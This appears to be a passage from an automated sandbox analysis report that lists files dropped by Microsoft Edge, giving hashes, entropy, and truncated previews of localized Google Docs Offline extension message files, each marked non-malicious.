                                                                                                                                              Preview:{.. "createnew": {.. "message": "LUO UUSI".. },.. "explanationofflinedisabled": {.. "message": "Olet offline-tilassa. Jos haluat k.ytt.. Google Docsia ilman internetyhteytt., siirry Google Docsin etusivulle ja ota asetuksissa k.ytt..n offline-synkronointi, kun seuraavan kerran olet yhteydess. internetiin.".. },.. "explanationofflineenabled": {.. "message": "Olet offline-tilassa. Voit kuitenkin muokata k.ytett.viss. olevia tiedostoja tai luoda uusia.".. },.. "extdesc": {.. "message": "Muokkaa, luo ja katso dokumentteja, laskentataulukoita ja esityksi. ilman internetyhteytt..".. },.. "extname": {.. "message": "Google Docsin offline-tila".. },.. "learnmore": {.. "message": "Lis.tietoja".. },.. "popuphelptext": {.. "message": "Kirjoita, muokkaa ja tee yhteisty.t. paikasta riippumatta, my.s ilman internetyhteytt..".. }..}..
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):939
                                                                                                                                              Entropy (8bit):4.451724169062555
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:1HAXbH2eZXn6sjLITdRSJpGL/gWFJ3sqixO:ubHfZqsHIT/FLL3qO
                                                                                                                                              MD5:FCEA43D62605860FFF41BE26BAD80169
                                                                                                                                              SHA1:F25C2CE893D65666CC46EA267E3D1AA080A25F5B
                                                                                                                                              SHA-256:F51EEB7AAF5F2103C1043D520E5A4DE0FA75E4DC375E23A2C2C4AFD4D9293A72
                                                                                                                                              SHA-512:F66F113A26E5BCF54B9AAFA69DAE3C02C9C59BD5B9A05F829C92AF208C06DC8CCC7A1875CBB7B7CE425899E4BA27BFE8CE2CDAF43A00A1B9F95149E855989EE0
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{.. "createnew": {.. "message": "GUMAWA NG BAGO".. },.. "explanationofflinedisabled": {.. "message": "Naka-offline ka. Upang magamit ang Google Docs nang walang koneksyon sa internet, pumunta sa mga setting sa homepage ng Google Docs at i-on ang offline na pag-sync sa susunod na nakakonekta ka sa internet.".. },.. "explanationofflineenabled": {.. "message": "Naka-offline ka, ngunit maaari mo pa ring i-edit ang mga available na file o gumawa ng mga bago.".. },.. "extdesc": {.. "message": "I-edit, gawin, at tingnan ang iyong mga dokumento, spreadsheet, at presentation . lahat ng ito nang walang access sa internet.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Matuto Pa".. },.. "popuphelptext": {.. "message": "Magsulat, mag-edit at makipag-collaborate nasaan ka man, nang mayroon o walang koneksyon sa internet.".. }..}..
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):977
                                                                                                                                              Entropy (8bit):4.622066056638277
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:1HAdy42ArMdsH50Jd6Z1PCBolXAJ+GgNHp0X16M1J1:EyfArMS2Jd6Z1PCBolX2+vNmX16Y1
                                                                                                                                              MD5:A58C0EEBD5DC6BB5D91DAF923BD3A2AA
                                                                                                                                              SHA1:F169870EEED333363950D0BCD5A46D712231E2AE
                                                                                                                                              SHA-256:0518287950A8B010FFC8D52554EB82E5D93B6C3571823B7CECA898906C11ABCC
                                                                                                                                              SHA-512:B04AFD61DE490BC838354E8DC6C22BE5C7AC6E55386FFF78489031ACBE2DBF1EAA2652366F7A1E62CE87CFCCB75576DA3B2645FEA1645B0ECEB38B1FA3A409E8
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour pouvoir utiliser Google.Docs sans connexion Internet, acc.dez aux param.tres de la page d'accueil de Google.Docs et activez la synchronisation hors connexion lors de votre prochaine connexion . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez quand m.me modifier les fichiers disponibles ou cr.er des fichiers.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez des documents, feuilles de calcul et pr.sentations, sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Docs hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": "R.digez des documents, modifiez-les et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):972
                                                                                                                                              Entropy (8bit):4.621319511196614
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:1HAdyg2pwbv1V8Cd61PC/vT2fg3YHDyM1J1:EyHpwbpd61C/72Y3YOY1
                                                                                                                                              MD5:6CAC04BDCC09034981B4AB567B00C296
                                                                                                                                              SHA1:84F4D0E89E30ED7B7ACD7644E4867FFDB346D2A5
                                                                                                                                              SHA-256:4CAA46656ECC46A420AA98D3307731E84F5AC1A89111D2E808A228C436D83834
                                                                                                                                              SHA-512:160590B6EC3DCF48F3EA7A5BAA11A8F6FA4131059469623E00AD273606B468B3A6E56D199E97DAA0ECB6C526260EBAE008570223F2822811F441D1C900DC33D6
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour utiliser Google.Documents sans connexion Internet, acc.dez aux param.tres sur la page d'accueil Google.Documents et activez la synchronisation hors ligne la prochaine fois que vous .tes connect. . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez toujours modifier les fichiers disponibles ou en cr.er.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez vos documents, vos feuilles de calcul et vos pr.sentations, le tout sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Documents hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": ".crivez, modifiez et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):990
                                                                                                                                              Entropy (8bit):4.497202347098541
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:1HASvggECBxNbWVqMjlMgaPLqXPhTth0CBxebWbMRCSUCjAKFCSIj0tR7tCBhP1l:1HACzWsMlajIhJhHKWbFKFC0tR8oNK5
                                                                                                                                              MD5:6BAAFEE2F718BEFBC7CD58A04CCC6C92
                                                                                                                                              SHA1:CE0BDDDA2FA1F0AD222B604C13FF116CBB6D02CF
                                                                                                                                              SHA-256:0CF098DFE5BBB46FC0132B3CF0C54B06B4D2C8390D847EE2A65D20F9B7480F4C
                                                                                                                                              SHA-512:3DA23E74CD6CF9C0E2A0C4DBA60301281D362FB0A2A908F39A55ABDCA4CC69AD55638C63CC3BEFD44DC032F9CBB9E2FDC1B4C4ABE292917DF8272BA25B82AF20
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{.. "createnew": {.. "message": "CREAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est.s sen conexi.n. Para utilizar Documentos de Google sen conexi.n a Internet, accede .s opci.ns de configuraci.n na p.xina de inicio de Documentos de Google e activa a sincronizaci.n sen conexi.n a pr.xima vez que esteas conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "Est.s sen conexi.n. A.nda podes editar os ficheiros dispo.ibles ou crear outros novos.".. },.. "extdesc": {.. "message": "Modifica, crea e consulta os teus documentos, follas de c.lculo e presentaci.ns sen necesidade de acceder a Internet.".. },.. "extname": {.. "message": "Documentos de Google sen conexi.n".. },.. "learnmore": {.. "message": "M.is informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, edita e colabora esteas onde esteas, tanto se tes conexi.n a Internet como se non a tes.".. }..}..
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1658
                                                                                                                                              Entropy (8bit):4.294833932445159
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:1HA3k3FzEVeXWuvLujNzAK11RiqRC2sA0O3cEiZ7dPRFFOPtZdK0A41yG3BczKT3:Q4pE4rCjNjw6/0y+5j8ZHA4PBSKr
                                                                                                                                              MD5:BC7E1D09028B085B74CB4E04D8A90814
                                                                                                                                              SHA1:E28B2919F000B41B41209E56B7BF3A4448456CFE
                                                                                                                                              SHA-256:FE8218DF25DB54E633927C4A1640B1A41B8E6CB3360FA386B5382F833B0B237C
                                                                                                                                              SHA-512:040A8267D67DB05BBAA52F1FAC3460F58D35C5B73AA76BBF17FA78ACC6D3BFB796A870DD44638F9AC3967E35217578A20D6F0B975CEEEEDBADFC9F65BE7E72C9
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{.. "createnew": {.. "message": ".... .....".. },.. "explanationofflinedisabled": {.. "message": "... ...... ... ........ ....... ... Google .......... ..... .... ...., ... .... .... ...... ........ .... ...... ... ...... Google ........ ...... .. ........ .. ... ... ...... ....... .... ....".. },.. "explanationofflineenabled": {.. "message": "... ...... .., ..... ... ... .. ...... ..... ....... ... ... .. .... ... ..... ... ...".. },.. "extdesc": {.. "message": "..... ........., ..
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1672
                                                                                                                                              Entropy (8bit):4.314484457325167
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:46G2+ymELbLNzGVx/hXdDtxSRhqv7Qm6/7Lm:4GbxzGVzXdDtx+qzU/7C
                                                                                                                                              MD5:98A7FC3E2E05AFFFC1CFE4A029F47476
                                                                                                                                              SHA1:A17E077D6E6BA1D8A90C1F3FAF25D37B0FF5A6AD
                                                                                                                                              SHA-256:D2D1AFA224CDA388FF1DC8FAC24CDA228D7CE09DE5D375947D7207FA4A6C4F8D
                                                                                                                                              SHA-512:457E295C760ABFD29FC6BBBB7FC7D4959287BCA7FB0E3E99EB834087D17EED331DEF18138838D35C48C6DDC8A0134AFFFF1A5A24033F9B5607B355D3D48FDF88
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{.. "createnew": {.. "message": "... .....".. },.. "explanationofflinedisabled": {.. "message": ".. ...... .... ....... ....... .. .... Google ........ .. ..... .... .. ..., .... ... ....... .. ...... .... .. Google ........ .. ........ .. ...... ... .... .. ...... ....... .... .....".. },.. "explanationofflineenabled": {.. "message": ".. ...... ..., ..... .. .. .. ...... ...... ..... .. .... ... .. .. ...... ... .... ....".. },.. "extdesc": {.. "message": ".... .... ....... ...... ..
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):935
                                                                                                                                              Entropy (8bit):4.6369398601609735
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:1HA7sR5k/I+UX/hrcySxG1fIZ3tp/S/d6Gpb+D:YsE/I+UX/hVSxQ03f/Sj+D
                                                                                                                                              MD5:25CDFF9D60C5FC4740A48EF9804BF5C7
                                                                                                                                              SHA1:4FADECC52FB43AEC084DF9FF86D2D465FBEBCDC0
                                                                                                                                              SHA-256:73E6E246CEEAB9875625CD4889FBF931F93B7B9DEAA11288AE1A0F8A6E311E76
                                                                                                                                              SHA-512:EF00B08496427FEB5A6B9FB3FE2E5404525BE7C329D9DD2A417480637FD91885837D134A26980DCF9F61E463E6CB68F09A24402805807E656AF16B116A75E02C
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{.. "createnew": {.. "message": "IZRADI NOVI".. },.. "explanationofflinedisabled": {.. "message": "Vi ste izvan mre.e. Da biste koristili Google dokumente bez internetske veze, idite na postavke na po.etnoj stranici Google dokumenata i uklju.ite izvanmre.nu sinkronizaciju sljede.i put kada se pove.ete s internetom.".. },.. "explanationofflineenabled": {.. "message": "Vi ste izvan mre.e, no i dalje mo.ete ure.ivati dostupne datoteke i izra.ivati nove.".. },.. "extdesc": {.. "message": "Uredite, izradite i pregledajte dokumente, prora.unske tablice i prezentacije . sve bez pristupa internetu.".. },.. "extname": {.. "message": "Google dokumenti izvanmre.no".. },.. "learnmore": {.. "message": "Saznajte vi.e".. },.. "popuphelptext": {.. "message": "Pi.ite, ure.ujte i sura.ujte gdje god se nalazili, povezani s internetom ili izvanmre.no.".. }..}..
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1065
                                                                                                                                              Entropy (8bit):4.816501737523951
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:1HA6J54gEYwFFMxv4gvyB9FzmxlsN147g/zJcYwJgrus4QY2jom:NJ54gEYwUmgKHFzmsG7izJcYOgKgYjm
                                                                                                                                              MD5:8930A51E3ACE3DD897C9E61A2AEA1D02
                                                                                                                                              SHA1:4108506500C68C054BA03310C49FA5B8EE246EA4
                                                                                                                                              SHA-256:958C0F664FCA20855FA84293566B2DDB7F297185619143457D6479E6AC81D240
                                                                                                                                              SHA-512:126B80CD3428C0BC459EEAAFCBE4B9FDE2541A57F19F3EC7346BAF449F36DC073A9CF015594A57203255941551B25F6FAA6D2C73C57C44725F563883FF902606
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{.. "createnew": {.. "message": ".J L.TREHOZ.SA".. },.. "explanationofflinedisabled": {.. "message": "Jelenleg offline .llapotban van. Ha a Google Dokumentumokat internetkapcsolat n.lk.l szeretn. haszn.lni, a legk.zelebbi internethaszn.lata sor.n nyissa meg a Google Dokumentumok kezd.oldal.n tal.lhat. be.ll.t.sokat, .s tiltsa le az offline szinkroniz.l.s be.ll.t.st.".. },.. "explanationofflineenabled": {.. "message": "Offline .llapotban van, de az el.rhet. f.jlokat .gy is szerkesztheti, valamint l.trehozhat .jakat.".. },.. "extdesc": {.. "message": "Szerkesszen, hozzon l.tre .s tekintsen meg dokumentumokat, t.bl.zatokat .s prezent.ci.kat . ak.r internetkapcsolat n.lk.l is.".. },.. "extname": {.. "message": "Google Dokumentumok Offline".. },.. "learnmore": {.. "message": "Tov.bbi inform.ci.".. },.. "popuphelptext": {.. "message": ".rjon, szerkesszen .s dolgozzon egy.tt m.sokkal
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):2771
                                                                                                                                              Entropy (8bit):3.7629875118570055
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:Y0Fx+eiYZBZ7K1ZZ/5QQxTuDLoFZaIZSK7lq0iC0mlMO6M3ih1oAgC:lF2BTz6N/
                                                                                                                                              MD5:55DE859AD778E0AA9D950EF505B29DA9
                                                                                                                                              SHA1:4479BE637A50C9EE8A2F7690AD362A6A8FFC59B2
                                                                                                                                              SHA-256:0B16E3F8BD904A767284345AE86A0A9927C47AFE89E05EA2B13AD80009BDF9E4
                                                                                                                                              SHA-512:EDAB2FCC14CABB6D116E9C2907B42CFBC34F1D9035F43E454F1F4D1F3774C100CBADF6B4C81B025810ED90FA91C22F1AEFE83056E4543D92527E4FE81C7889A8
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{"createnew":{"message":"\u054d\u054f\u0535\u0542\u053e\u0535\u053c \u0546\u0548\u0550"},"explanationofflinedisabled":{"message":"Google \u0553\u0561\u057d\u057f\u0561\u0569\u0572\u0569\u0565\u0580\u0568 \u0576\u0561\u0587 \u0561\u0576\u0581\u0561\u0576\u0581 \u057c\u0565\u056a\u056b\u0574\u0578\u0582\u0574 \u0585\u0563\u057f\u0561\u0563\u0578\u0580\u056e\u0565\u056c\u0578\u0582 \u0570\u0561\u0574\u0561\u0580 \u0574\u056b\u0561\u0581\u0565\u0584 \u0570\u0561\u0574\u0561\u0581\u0561\u0576\u0581\u056b\u0576, \u0562\u0561\u0581\u0565\u0584 \u056e\u0561\u057c\u0561\u0575\u0578\u0582\u0569\u0575\u0561\u0576 \u0563\u056c\u056d\u0561\u057e\u0578\u0580 \u0567\u057b\u0568, \u0561\u0576\u0581\u0565\u0584 \u056f\u0561\u0580\u0563\u0561\u057e\u0578\u0580\u0578\u0582\u0574\u0576\u0565\u0580 \u0587 \u0574\u056b\u0561\u0581\u0580\u0565\u0584 \u0561\u0576\u0581\u0561\u0576\u0581 \u0570\u0561\u0574\u0561\u056a\u0561\u0574\u0561\u0581\u0578\u0582\u0574\u0568:"},"explanationofflineenabled":{"message":"\u
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):858
                                                                                                                                              Entropy (8bit):4.474411340525479
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:1HASvgJX4CBxNpXemNOAJRFqjRpCBxedIdjTi92OvbCSUuoi01uRwCBhUuvz1thK:1HARXzhXemNOQWGcEoeH1eXJNvT2
                                                                                                                                              MD5:34D6EE258AF9429465AE6A078C2FB1F5
                                                                                                                                              SHA1:612CAE151984449A4346A66C0A0DF4235D64D932
                                                                                                                                              SHA-256:E3C86DDD2EFEBE88EED8484765A9868202546149753E03A61EB7C28FD62CFCA1
                                                                                                                                              SHA-512:20427807B64A0F79A6349F8A923152D9647DA95C05DE19AD3A4BF7DB817E25227F3B99307C8745DD323A6591B515221BD2F1E92B6F1A1783BDFA7142E84601B1
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{.. "createnew": {.. "message": "BUAT BARU".. },.. "explanationofflinedisabled": {.. "message": "Anda sedang offline. Untuk menggunakan Google Dokumen tanpa koneksi internet, buka setelan di beranda Google Dokumen dan aktifkan sinkronisasi offline saat terhubung ke internet.".. },.. "explanationofflineenabled": {.. "message": "Anda sedang offline, namun Anda masih dapat mengedit file yang tersedia atau membuat file baru.".. },.. "extdesc": {.. "message": "Edit, buat, dan lihat dokumen, spreadsheet, dan presentasi . tanpa perlu akses internet.".. },.. "extname": {.. "message": "Google Dokumen Offline".. },.. "learnmore": {.. "message": "Pelajari Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit, dan gabungkan di mana saja, dengan atau tanpa koneksi internet.".. }..}..
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):954
                                                                                                                                              Entropy (8bit):4.6457079159286545
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:YGXU2rOcxGe+J97M9TP2DBX9tMfxqbTMvOfWWgdraqlifVpm0Ekf95Mw89KkJ+je:YwBrD2g2DBLMfFuWvdpY94viDO+uh
                                                                                                                                              MD5:CAEB37F451B5B5E9F5EB2E7E7F46E2D7
                                                                                                                                              SHA1:F917F9EAE268A385A10DB3E19E3CC3ACED56D02E
                                                                                                                                              SHA-256:943E61988C859BB088F548889F0449885525DD660626A89BA67B2C94CFBFBB1B
                                                                                                                                              SHA-512:A55DEC2404E1D7FA5A05475284CBECC2A6208730F09A227D75FDD4AC82CE50F3751C89DC687C14B91950F9AA85503BD6BF705113F2F1D478E728DF64D476A9EE
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{"createnew":{"message":"B\u00daA TIL N\u00ddTT"},"explanationofflinedisabled":{"message":"\u00de\u00fa ert \u00e1n nettengingar. Til a\u00f0 nota Google-skj\u00f6l \u00e1n nettengingar skaltu opna stillingarnar \u00e1 heimas\u00ed\u00f0u Google skjala og virkja samstillingu \u00e1n nettengingar n\u00e6st \u00feegar \u00fe\u00fa tengist netinu."},"explanationofflineenabled":{"message":"Engin nettenging. \u00de\u00fa getur samt sem \u00e1\u00f0ur breytt tilt\u00e6kum skr\u00e1m e\u00f0a b\u00fai\u00f0 til n\u00fdjar."},"extdesc":{"message":"Breyttu, b\u00fa\u00f0u til og sko\u00f0a\u00f0u skj\u00f6lin \u00fe\u00edn, t\u00f6flureikna og kynningar \u2014 allt \u00e1n nettengingar."},"extname":{"message":"Google-skj\u00f6l \u00e1n nettengingar"},"learnmore":{"message":"Frekari uppl\u00fdsingar"},"popuphelptext":{"message":"Skrifa\u00f0u, breyttu og starfa\u00f0u me\u00f0 \u00f6\u00f0rum hvort sem nettenging er til sta\u00f0ar e\u00f0a ekki."}}.
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):899
                                                                                                                                              Entropy (8bit):4.474743599345443
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:1HASvggrCBxNp8WJOJJrJ3WytVCBxep3bjP5CSUCjV8AgJJm2CBhr+z1tWgjqEOW:1HANXJOTBFtKa8Agju4NB3j
                                                                                                                                              MD5:0D82B734EF045D5FE7AA680B6A12E711
                                                                                                                                              SHA1:BD04F181E4EE09F02CD53161DCABCEF902423092
                                                                                                                                              SHA-256:F41862665B13C0B4C4F562EF1743684CCE29D4BCF7FE3EA494208DF253E33885
                                                                                                                                              SHA-512:01F305A280112482884485085494E871C66D40C0B03DE710B4E5F49C6A478D541C2C1FDA2CEAF4307900485946DEE9D905851E98A2EB237642C80D464D1B3ADA
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{.. "createnew": {.. "message": "CREA NUOVO".. },.. "explanationofflinedisabled": {.. "message": "Sei offline. Per utilizzare Documenti Google senza una connessione Internet, apri le impostazioni nella home page di Documenti Google e attiva la sincronizzazione offline la prossima volta che ti colleghi a Internet.".. },.. "explanationofflineenabled": {.. "message": "Sei offline, ma puoi comunque modificare i file disponibili o crearne di nuovi.".. },.. "extdesc": {.. "message": "Modifica, crea e visualizza documenti, fogli di lavoro e presentazioni, senza accesso a Internet.".. },.. "extname": {.. "message": "Documenti Google offline".. },.. "learnmore": {.. "message": "Ulteriori informazioni".. },.. "popuphelptext": {.. "message": "Scrivi, modifica e collabora ovunque ti trovi, con o senza una connessione Internet.".. }..}..
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):2230
                                                                                                                                              Entropy (8bit):3.8239097369647634
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:YIiTVLrLD1MEzMEH82LBLjO5YaQEqLytLLBm3dnA5LcqLWAU75yxFLcx+UxWRJLI:YfTFf589rZNgNA12Qzt4/zRz2vc
                                                                                                                                              MD5:26B1533C0852EE4661EC1A27BD87D6BF
                                                                                                                                              SHA1:18234E3ABAF702DF9330552780C2F33B83A1188A
                                                                                                                                              SHA-256:BBB81C32F482BA3216C9B1189C70CEF39CA8C2181AF3538FFA07B4C6AD52F06A
                                                                                                                                              SHA-512:450BFAF0E8159A4FAE309737EA69CA8DD91CAAFD27EF662087C4E7716B2DCAD3172555898E75814D6F11487F4F254DE8625EF0CFEA8DF0133FC49E18EC7FD5D2
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{"createnew":{"message":"\u05d9\u05e6\u05d9\u05e8\u05ea \u05d7\u05d3\u05e9"},"explanationofflinedisabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8. \u05db\u05d3\u05d9 \u05dc\u05d4\u05e9\u05ea\u05de\u05e9 \u05d1-Google Docs \u05dc\u05dc\u05d0 \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d1\u05d4\u05ea\u05d7\u05d1\u05e8\u05d5\u05ea \u05d4\u05d1\u05d0\u05d4 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d9\u05e9 \u05dc\u05e2\u05d1\u05d5\u05e8 \u05dc\u05e7\u05d8\u05e2 \u05d4\u05d4\u05d2\u05d3\u05e8\u05d5\u05ea \u05d1\u05d3\u05e3 \u05d4\u05d1\u05d9\u05ea \u05e9\u05dc Google Docs \u05d5\u05dc\u05d4\u05e4\u05e2\u05d9\u05dc \u05e1\u05e0\u05db\u05e8\u05d5\u05df \u05d1\u05de\u05e6\u05d1 \u05d0\u05d5\u05e4\u05dc\u05d9\u05d9\u05df."},"explanationofflineenabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1160
                                                                                                                                              Entropy (8bit):5.292894989863142
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:1HAoc3IiRF1viQ1RF3CMP3rnicCCAFrr1Oo0Y5ReXCCQkb:Dc3zF7F3CMTnOCAFVLHXCFb
                                                                                                                                              MD5:15EC1963FC113D4AD6E7E59AE5DE7C0A
                                                                                                                                              SHA1:4017FC6D8B302335469091B91D063B07C9E12109
                                                                                                                                              SHA-256:34AC08F3C4F2D42962A3395508818B48CA323D22F498738CC9F09E78CB197D73
                                                                                                                                              SHA-512:427251F471FA3B759CA1555E9600C10F755BC023701D058FF661BEC605B6AB94CFB3456C1FEA68D12B4D815FFBAFABCEB6C12311DD1199FC783ED6863AF97C0F
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{.. "createnew": {.. "message": "....".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ............................... Google .............. [..] .......[.......] ...........".. },.. "explanationofflineenabled": {.. "message": ".............................................".. },.. "extdesc": {.. "message": ".........................................................".. },.. "extname": {.. "message": "Google ..... ......".. },.. "learnmore": {.. "message": "..".. },.. "popuphelp
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):3264
                                                                                                                                              Entropy (8bit):3.586016059431306
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:YGFbhVhVn0nM/XGbQTvxnItVJW/476CFdqaxWNlR:HFbhV/n0MfGbw875FkaANlR
                                                                                                                                              MD5:83F81D30913DC4344573D7A58BD20D85
                                                                                                                                              SHA1:5AD0E91EA18045232A8F9DF1627007FE506A70E0
                                                                                                                                              SHA-256:30898BBF51BDD58DB397FF780F061E33431A38EF5CFC288B5177ECF76B399F26
                                                                                                                                              SHA-512:85F97F12AD4482B5D9A6166BB2AE3C4458A582CF575190C71C1D8E0FB87C58482F8C0EFEAD56E3A70EDD42BED945816DB5E07732AD27B8FFC93F4093710DD58F
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{"createnew":{"message":"\u10d0\u10ee\u10da\u10d8\u10e1 \u10e8\u10d4\u10e5\u10db\u10dc\u10d0"},"explanationofflinedisabled":{"message":"\u10d7\u10e5\u10d5\u10d4\u10dc \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10ee\u10d0\u10e0\u10d7. Google Docs-\u10d8\u10e1 \u10d8\u10dc\u10e2\u10d4\u10e0\u10dc\u10d4\u10e2\u10d7\u10d0\u10dc \u10d9\u10d0\u10d5\u10e8\u10d8\u10e0\u10d8\u10e1 \u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10d2\u10d0\u10db\u10dd\u10e1\u10d0\u10e7\u10d4\u10dc\u10d4\u10d1\u10da\u10d0\u10d3 \u10d2\u10d0\u10d3\u10d0\u10d3\u10d8\u10d7 \u10de\u10d0\u10e0\u10d0\u10db\u10d4\u10e2\u10e0\u10d4\u10d1\u10d6\u10d4 Google Docs-\u10d8\u10e1 \u10db\u10d7\u10d0\u10d5\u10d0\u10e0 \u10d2\u10d5\u10d4\u10e0\u10d3\u10d6\u10d4 \u10d3\u10d0 \u10e9\u10d0\u10e0\u10d7\u10d4\u10d7 \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10e1\u10d8\u10dc\u10e5\u10e0\u10dd\u10dc\u10d8\u10d6\u10d0\u10ea\u10d8\u10d0, \u10e0\u10dd\u10d3\u10d4\u10e1\u10d0\u10ea \u10e8\u10d4\u10db\u10d3\u10d2\u10dd\u10
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):3235
                                                                                                                                              Entropy (8bit):3.6081439490236464
                                                                                                                                              Encrypted:false
